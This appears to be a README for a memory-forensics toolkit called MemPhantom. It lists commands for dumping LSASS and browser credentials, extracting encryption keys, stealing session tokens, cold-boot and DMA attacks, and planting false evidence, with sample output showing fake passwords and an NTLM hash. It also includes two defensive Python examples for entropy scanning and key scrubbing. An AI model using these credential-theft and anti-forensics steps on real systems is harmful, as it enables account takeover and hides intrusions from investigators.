Advanced memory forensics toolkit for volatile data extraction, RAM analysis, and anti-forensics techniques. Extracts secrets from running processes including passwords, encryption keys, and in-memory malware.
- Live RAM Dumping - Extract full memory from running systems
- Process Memory Scraping - Target specific processes for secrets
- Kernel Memory Analysis - Direct kernel space examination
- Cold Boot Attack - Extract encryption keys from powered-off RAM
- DMA-based Acquisition - Hardware-level memory access via FireWire/Thunderbolt
- Credential Harvesting - Extract passwords from LSASS, browsers, SSH agents
- Encryption Key Recovery - Find AES/RSA keys in memory
- Private Key Extraction - SSL/TLS certificates from web servers
- Bitcoin Wallet Keys - Cryptocurrency wallet recovery
- Session Token Stealing - Active authentication tokens
- In-Memory Malware Detection - Find process hollowing, code injection
- Rootkit Detection - Identify kernel-mode rootkits via memory forensics
- Unpacking - Extract packed/encrypted malware from RAM
- Behavioral Analysis - Track malware activity in real-time
- Memory Wiping - Secure deletion of process secrets
- Key Scrubbing - Remove cryptographic material from RAM
- Evidence Elimination - Clean forensic artifacts
- Deception - Plant false evidence in memory
```bash
git clone https://github.com/varungor365/memphantom.git
cd memphantom
pip install -r requirements.txt
# Requires root/admin for memory access
sudo python setup.py install
```

```bash
# Dump specific process
sudo python memphantom.py --dump --pid 1234 --output process.dmp
# Dump all processes
sudo python memphantom.py --dump-all --output /dumps/
```

```bash
# Extract from LSASS (Windows)
sudo python memphantom.py --lsass --output creds.txt
# Extract from browsers
sudo python memphantom.py --browsers --output browser_creds.json
```

```bash
# Search for AES keys
sudo python memphantom.py --find-keys --algorithm AES --output keys.bin
# Find RSA private keys
sudo python memphantom.py --find-keys --algorithm RSA --output rsa_keys.pem
```

```bash
# Scan for injected code
sudo python memphantom.py --scan-injection --report malware.json
# Detect rootkits
sudo python memphantom.py --scan-rootkit --detailed
```

```bash
# Wipe sensitive data from memory
sudo python memphantom.py --wipe --pid 5678
# Secure process termination (wipe then kill)
sudo python memphantom.py --secure-kill --pid 5678
```

```
[+] MemPhantom v2.0 - Advanced Memory Forensics
[+] Target: LSASS (PID 612)
[+] Dumping process memory: 145 MB
[+] Analyzing memory structures...
[!] CREDENTIALS FOUND:
┌────────────────────────────────────────────┐
│ User: DOMAIN\Administrator
│ Password: P@ssw0rd123!
│ NTLM Hash: 8846f7eaee8fb117ad06bdd830b7586c
│ Location: 0x7FFE0000 (LSASS heap)
└────────────────────────────────────────────┘
┌────────────────────────────────────────────┐
│ Service: Chrome (gmail.com)
│ Username: user@gmail.com
│ Password: MySecretPass2024
│ Location: 0x12340000 (Chrome process)
└────────────────────────────────────────────┘
[+] Total credentials extracted: 47
[+] Unique accounts: 23
[+] Report saved: credentials_report.html
```

```
[!] AES-256 KEY FOUND:
Key: 0x3a5f7e9c1b2d4f6a8e0c7b9d1f3e5a7c9b1d3f5e7a9c1b3d5f7e9a1c3e5f7a9c
Location: 0x00401000 (OpenSSL heap)
Context: TLS session encryption
Strength: 256-bit
[!] RSA PRIVATE KEY DETECTED:
Size: 4096-bit
Format: PKCS#1
Location: 0x7FFEE000
Owner: nginx (PID 8192)
Certificate CN: www.example.com
```

```
[!] SUSPICIOUS ACTIVITY DETECTED:
⚠️ Process Hollowing
PID: 3456 (svchost.exe)
Hollowed by: unknown.exe
Malicious code at: 0x00400000
Entropy: 7.9 (likely packed)
⚠️ Code Injection
Target: explorer.exe (PID 1234)
Injector: malware.dll
Injection type: CreateRemoteThread
Shellcode at: 0x10000000
⚠️ Kernel Rootkit
Driver: rootkit.sys
SSDT hooks: 12 functions
Hidden processes: 3
Hidden files: 47
```
| Method | Speed | Stealth | Requires |
|---|---|---|---|
| /dev/mem | Fast | Low | Root, older kernels |
| /proc/kcore | Fast | Low | Root |
| ptrace() | Slow | Medium | Same user or root |
| DMA (FireWire) | Very Fast | High | Physical access |
| Cold Boot | N/A | Highest | Physical access + reboot |
- ✅ Linux - Full support (2.6+ kernels)
- ✅ Windows - Via WinPmem driver
- ✅ macOS - Limited (SIP restrictions)
- ✅ Memory Dumps - Analyze existing .raw/.dmp files
- Pattern Matching - Known structures (Windows LSASS, Linux shadow)
- Entropy Analysis - High-entropy regions likely encrypted/packed
- Structure Validation - Verify key formats (PEM, DER, PKCS)
- Context Analysis - Surrounding memory hints at usage
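As an added illustration of two of the heuristics listed above, entropy analysis and structure validation, the following standalone Python is example code written for this page and is not part of MemPhantom. It scans a constructed buffer that stands in for a memory dump; the function names, the 256-byte window, the 7.0-bit threshold and the sample data are this example's own assumptions. The functions take any `bytes`, so the same code runs unchanged over a real `.raw` file read from disk.

```python
"""Added example (not MemPhantom code): sliding-window entropy analysis and
PEM structure validation over a constructed buffer that stands in for a
memory dump. Function names, window size and threshold are this example's
own assumptions."""
import base64
import binascii
import math
import random
import re

# PEM object: matching BEGIN/END labels around a base64 body.
PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z ]+)-----\s*([A-Za-z0-9+/=\s]+?)\s*-----END \1-----"
)


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte of the chunk (0.0 for a constant run, 8.0 at most)."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def high_entropy_regions(buf: bytes, window: int = 256, threshold: float = 7.0):
    """Return (offset, entropy) for each non-overlapping window at or above the
    threshold, i.e. regions that look encrypted, compressed or packed.
    The threshold depends on the window: small windows under-estimate the
    entropy of truly random data, hence 7.0 rather than 7.9 for 256 bytes."""
    hits = []
    for off in range(0, len(buf) - window + 1, window):
        e = round(shannon_entropy(buf[off:off + window]), 2)
        if e >= threshold:
            hits.append((off, e))
    return hits


def find_pem_blocks(buf: bytes):
    """Structure validation: a PEM header alone is not evidence. The body must
    be valid base64 and decode to a DER SEQUENCE (first byte 0x30), which is
    what PKCS#1/PKCS#8 private keys and X.509 certificates start with.
    Returns (offset, label, der_length) per validated object."""
    found = []
    for m in PEM_RE.finditer(buf):
        label = m.group(1).decode()
        body = re.sub(rb"\s+", b"", m.group(2))
        try:
            der = base64.b64decode(body, validate=True)
        except (binascii.Error, ValueError):
            continue
        if der[:1] == b"\x30":
            found.append((m.start(), label, len(der)))
    return found


def build_sample() -> bytes:
    """Constructed dump: zero pages, one well-formed PEM object whose DER
    payload is a minimal SEQUENCE, one PEM header with a malformed body,
    filler, then 1024 bytes in which every 256-byte window is a permutation
    of 0..255 (maximum entropy, a stand-in for key or packed material)."""
    der = b"\x30\x06\x02\x01\x00\x02\x01\x2a"  # SEQUENCE { INTEGER 0, INTEGER 42 }
    good_pem = (b"-----BEGIN PRIVATE KEY-----\n" + base64.encodebytes(der)
                + b"-----END PRIVATE KEY-----\n")
    bad_pem = (b"-----BEGIN RSA PRIVATE KEY-----\nQUJDREVGR0g\n"
               b"-----END RSA PRIVATE KEY-----\n")  # body length not a multiple of 4
    head = b"\x00" * 512 + good_pem + bad_pem
    head += b"A" * (2048 - len(head))          # low-entropy filler up to offset 2048
    rng = random.Random(1337)
    noise = b""
    for _ in range(4):
        perm = list(range(256))
        rng.shuffle(perm)
        noise += bytes(perm)
    return head + noise + b"\x00" * 256


if __name__ == "__main__":
    dump = build_sample()
    for off, e in high_entropy_regions(dump):
        print(f"high entropy at 0x{off:08x}: {e} bits/byte")
    for off, label, n in find_pem_blocks(dump):
        print(f"validated PEM '{label}' at 0x{off:08x}, DER length {n}")
```

Two points the code makes that the list does not: the entropy threshold has to be chosen per window size (256 random bytes measure well below 8 bits per byte because most of the 256 symbols never appear), and a PEM header by itself is a weak signal, since the malformed object in the sample is rejected only because the body is checked as base64 and as DER.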
```bash
# 1. Freeze RAM with compressed air
# 2. Quickly reboot into forensics live USB
# 3. Dump RAM before decay
sudo python memphantom.py --cold-boot --output frozen_ram.raw
# 4. Search for encryption keys
python memphantom.py --analyze frozen_ram.raw --find-keys
```

```bash
# Requires FireWire/Thunderbolt access
sudo python memphantom.py --dma --device /dev/fw0 --output dma_dump.raw
```

```bash
# Monitor process memory for changes
sudo python memphantom.py --monitor --pid 1234 --interval 5
# Alert on new secrets
sudo python memphantom.py --watch --alert-on-secrets
```

```bash
# Take snapshot
sudo python memphantom.py --snapshot --pid 1234 --output before.dmp
# ... system activity ...
# Compare
sudo python memphantom.py --diff before.dmp after.dmp --highlight-secrets
```

```python
from memphantom import SecureWipe

# Wipe specific memory region
SecureWipe.region(process_id=1234, start=0x400000, size=4096)
# Wipe all process secrets
SecureWipe.process_secrets(process_id=1234)
# Wipe and terminate
SecureWipe.secure_kill(process_id=1234)
```
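The SecureWipe calls above operate on another process. The following is an added example, written for this page and not MemPhantom's code, of the same idea applied inside your own program: keep a secret in storage that can actually be overwritten, scrub it as soon as it is no longer needed, and verify at the raw address that the bytes are gone. The class and function names and the sample key bytes are this example's own assumptions.

```python
"""Added example (not MemPhantom code): in-process key scrubbing, the
defensive counterpart of the scrub/wipe commands on this page. Holds a secret
in a buffer that can be overwritten, checks at the raw address that the bytes
are gone, and rejects immutable objects that cannot be scrubbed. Names are
this example's own."""
import ctypes


def zeroize(buf: bytearray) -> None:
    """Overwrite the bytearray's backing store in place with memset.
    Only mutable buffers can be scrubbed: bytes and str are immutable, and
    every slice, concatenation or decode of them leaves an unscrubbed copy
    on the heap that a memory scan would still find."""
    if not isinstance(buf, bytearray):
        raise TypeError(
            f"cannot scrub immutable {type(buf).__name__}; keep secrets in bytearray")
    if not buf:
        return
    view = ctypes.c_char.from_buffer(buf)      # borrows the existing storage, no copy
    ctypes.memset(ctypes.addressof(view), 0, len(buf))
    del view                                   # release the buffer export


def raw_bytes_at(buf: bytearray) -> bytes:
    """Read the storage through its raw address, bypassing the Python object,
    which is how a scanner walking the process heap would see it."""
    if not buf:
        return b""
    view = ctypes.c_char.from_buffer(buf)
    data = ctypes.string_at(ctypes.addressof(view), len(buf))
    del view
    return data


class SecretBuffer:
    """Context manager that owns one secret and scrubs it on exit, including
    when the block raises, so the key does not outlive its use."""

    def __init__(self, secret: bytes):
        self._buf = bytearray(secret)   # copies once into scrubbable storage

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.scrub()
        return False                    # never swallow exceptions

    def __len__(self):
        return len(self._buf)

    def view(self) -> memoryview:
        """Zero-copy read access; avoid bytes(...)/str(...) conversions,
        each of which creates another copy that cannot be scrubbed."""
        return memoryview(self._buf)

    def scrub(self) -> None:
        zeroize(self._buf)

    def is_scrubbed(self) -> bool:
        return not any(self._buf)


if __name__ == "__main__":
    key = bytearray(b"constructed-session-key")   # constructed sample value
    print("before:", raw_bytes_at(key))
    zeroize(key)
    print("after: ", raw_bytes_at(key))
```

The caveat that matters in practice: the original `bytes` passed into `SecretBuffer` is itself immutable and stays on the heap until the interpreter frees and reuses that memory, so the secret should be produced directly into a `bytearray` (for example via `readinto`) rather than converted afterwards, and the same applies to any `str` or `bytes` copy made while using it.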
```bash
# Remove all crypto keys from process
sudo python memphantom.py --scrub-keys --pid 1234
# Wipe specific key types
sudo python memphantom.py --scrub-keys --type AES,RSA --pid 1234
```

Software:
- Python 3.8+
- GCC (for C extensions)
- Root/Administrator access
- Volatility3 (optional, for advanced analysis)
Python Packages:
```
volatility3
pycryptodome
capstone
yara-python
rekall
```
Hardware (Optional):
- FireWire/Thunderbolt adapter (for DMA attacks)
- USB drive (for cold boot attacks)
- Post-exploitation credential harvesting
- Privilege escalation via key extraction
- Anti-forensics for operational security
- Malware memory analysis
- Rootkit detection
- Live forensics without shutting down systems
- Criminal investigations
- Data recovery
- Timeline reconstruction
- Vulnerability discovery
- Exploit development
- Reverse engineering
This tool is EXTREMELY POWERFUL and can:
- ✅ Extract all passwords from a running system
- ✅ Steal encryption keys and decrypt data
- ✅ Bypass most security controls
- ✅ Violate user privacy
Legal Use ONLY:
- ✅ Your own systems (authorized testing)
- ✅ Penetration tests (with written permission)
- ✅ Incident response (company authorization)
- ✅ Academic research (controlled environments)
Unauthorized use is ILLEGAL and may result in:
- Federal prosecution (CFAA, ECPA violations)
- Civil lawsuits
- Professional sanctions
- Prison sentences
Full documentation: docs/README.md
Key Topics:
- Memory acquisition techniques
- Secret detection algorithms
- Anti-forensics best practices
- Malware analysis workflows
- Legal and ethical guidelines
Security researchers welcome! Areas for contribution:
- New secret detection patterns
- Support for additional platforms
- Performance optimizations
- Anti-anti-forensics techniques
GPL-3.0 - See LICENSE
Research and authorized testing only. Respect privacy and laws.
Varun Goradhiya
- GitHub: @varungor365
- Portfolio: github.com/varungor365
Related Projects:
- phantom-lkm - Kernel rootkit
- autofuzzer - Vulnerability fuzzer
- vault-destruct - Secure password manager
Advanced memory forensics for security professionals.
⚡ This tool represents cutting-edge forensics research - use responsibly.